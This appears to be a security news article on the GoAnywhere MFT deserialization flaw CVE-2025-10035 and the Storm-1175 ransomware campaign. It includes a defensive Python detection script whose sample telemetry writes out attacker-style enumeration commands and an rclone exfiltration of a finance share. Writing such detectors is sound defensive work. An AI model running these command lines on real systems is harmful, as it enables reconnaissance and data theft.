GoAnywhere 0-Day RCE Vulnerability Exploited in the Wild to Deploy Medusa Ransomware


A critical deserialization flaw in GoAnywhere MFT’s License Servlet, tracked as CVE-2025-10035, has already been weaponized by the Storm-1175 group to deploy Medusa ransomware.

The vulnerability affects GoAnywhere MFT versions up to 7.8.3. It resides in the License Servlet Admin Console, where a threat actor can forge a license response signature and bypass validation checks.

By deserializing an attacker-controlled object, the actor gains the ability to inject arbitrary commands into the Java process, ultimately leading to full remote code execution on internet-exposed instances.

Deserialization Flaw (CVE-2025-10035)

The flaw does not require authentication once a validly signed payload has been crafted or intercepted, making exploitation trivially achievable against unpatched systems.

Successful attacks allow system and user enumeration, long-term persistence, and deployment of additional tools to facilitate lateral movement and data exfiltration. 

Immediate patching is paramount; administrators must upgrade to the versions specified in Fortra’s advisory to remediate the issue and audit any potentially compromised environments.


Microsoft Threat Intelligence has attributed active exploitation to Storm-1175, a ransomware group notorious for targeting public-facing applications. 

Initial access is gained through the newly disclosed deserialization bug in GoAnywhere MFT. 

After seizing control, Storm-1175 drops RMM binaries, specifically MeshAgent and SimpleHelp, into the GoAnywhere service directory. Concurrently, malicious JSP web shells are created to facilitate stealthy remote access.

Post-exploitation, the actors run PowerShell commands to enumerate local users, groups, domain trust relationships, and network interfaces. 

Command and control channels are established via the RMM tools, often tunneled through Cloudflare to evade detection. 

Exfiltration is executed using rclone, with stolen data transferred to attacker-controlled cloud storage. The final stage involves encrypting victim assets with Medusa ransomware, which Microsoft Defender flags as Ransom:Win32/Medusa.
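The post-exploitation chain above (RMM binaries dropped into the GoAnywhere service directory, JSP web shells written by the service, the Java service spawning PowerShell enumeration, and rclone exfiltration) translates directly into endpoint detection rules. The following is an added example, not code from the article, Fortra or Microsoft: it runs four such rules over constructed endpoint telemetry records. The install path under `C:\Program Files\HelpSystems\GoAnywhere`, the web-root layout, the event field names and every sample record are assumptions made for the example and should be adjusted to the real deployment.

```python
"""Detection rules for the Storm-1175 post-exploitation behaviours described in the article.

Added example, not from the original page. Install path, telemetry schema and
sample events are constructed assumptions.
"""
import re
from dataclasses import dataclass

# Assumed GoAnywhere install root; the service's bundled java.exe lives beneath it.
GOANYWHERE_ROOT = r"C:\Program Files\HelpSystems\GoAnywhere"

# RMM tools the article names; matched case-insensitively on the file name.
RMM_NAMES = ("meshagent", "simplehelp")

# Enumeration the article describes: local users/groups, domain trusts, network interfaces.
ENUMERATION = re.compile(
    r"\bnet(?:\.exe)?\s+(?:user|group|localgroup)\b"
    r"|\bnltest(?:\.exe)?\b.*domain_trusts"
    r"|\bipconfig\b|Get-NetIPConfiguration|Get-NetAdapter",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: str
    detail: str


def _under_root(path: str) -> bool:
    """True when the path sits inside the assumed GoAnywhere install directory."""
    return path.lower().startswith(GOANYWHERE_ROOT.lower() + "\\")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Finding]:
    """Apply the four rules to file_create / process_create records and return the hits."""
    findings: list[Finding] = []
    for ev in events:
        if ev["type"] == "file_create" and _under_root(ev["path"]):
            name = _basename(ev["path"])
            # Rule 1: RMM binary written into the service directory.
            if any(tag in name for tag in RMM_NAMES):
                findings.append(Finding("rmm_binary_in_service_dir", ev["id"], name))
            # Rule 2: a .jsp file created by the service's own Java process (web shell drop).
            elif name.endswith(".jsp") and _under_root(ev["process"]):
                findings.append(Finding("jsp_written_by_service", ev["id"], name))
        elif ev["type"] == "process_create":
            image = _basename(ev["image"])
            # Rule 3: the Java service spawns PowerShell running enumeration commands.
            if image == "powershell.exe" and _under_root(ev["parent"]):
                hit = ENUMERATION.search(ev["cmdline"])
                if hit:
                    findings.append(Finding("service_spawned_enumeration", ev["id"], hit.group(0)))
            # Rule 4: rclone execution anywhere on the host.
            if image == "rclone.exe" or re.search(r"\brclone\b", ev["cmdline"], re.IGNORECASE):
                findings.append(Finding("rclone_execution", ev["id"], image))
    return findings


# Constructed telemetry: two benign records (e1, e5) and four matching the described chain.
JAVA = GOANYWHERE_ROOT + r"\jre\bin\java.exe"
SAMPLE_EVENTS = [
    {"id": "e1", "type": "file_create", "process": JAVA,
     "path": GOANYWHERE_ROOT + r"\userdata\config\cluster.xml"},
    {"id": "e2", "type": "file_create", "process": JAVA,
     "path": GOANYWHERE_ROOT + r"\tomcat\webapps\ROOT\cmd.jsp"},
    {"id": "e3", "type": "file_create", "process": JAVA,
     "path": GOANYWHERE_ROOT + r"\MeshAgent.exe"},
    {"id": "e4", "type": "process_create", "parent": JAVA,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -c "net user; net localgroup administrators; '
                'nltest /domain_trusts; ipconfig /all"'},
    {"id": "e5", "type": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    {"id": "e6", "type": "process_create", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares\Finance remote:bucket -P"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.event_id}  {f.detail}")
```

Rules 2 and 3 key on the parent being the GoAnywhere Java process rather than on file names alone, which is what separates a web shell drop or an injected command from routine administration; rule 4 is deliberately broad because rclone has no legitimate role on a managed file transfer server unless the organization has explicitly approved it.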

| Risk Factors | Details |
|---|---|
| Affected Products | GoAnywhere MFT License Servlet Admin Console, versions up to 7.8.3 |
| Impact | Command injection leading to RCE |
| Exploit Prerequisites | Validly forged or intercepted license response signature |
| CVSS 3.1 Score | 10.0 (Critical) |

Mitigations

Upgrade immediately to the patched GoAnywhere MFT release as per Fortra instructions.

Configure perimeter firewalls and proxies to block outbound connections from GoAnywhere servers unless explicitly approved.

Enable EDR in Block Mode to allow Microsoft Defender for Endpoint to block malicious artifacts even under passive AV conditions.

Deploy Attack Surface Reduction Rules to prevent common ransomware TTPs, such as blocking executable files that do not meet age or prevalence criteria and disabling web shell creation.

Monitor with External Attack Surface Management tools to identify unmanaged or unpatched GoAnywhere instances.

Leverage Automated Investigations and remediation features in Microsoft Defender to reduce dwell time and alert fatigue.

By adopting a defense-in-depth posture combining rapid patching, network segmentation, and advanced endpoint protection, organizations can thwart exploitation attempts and prevent Storm-1175's Medusa ransomware from taking hold.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.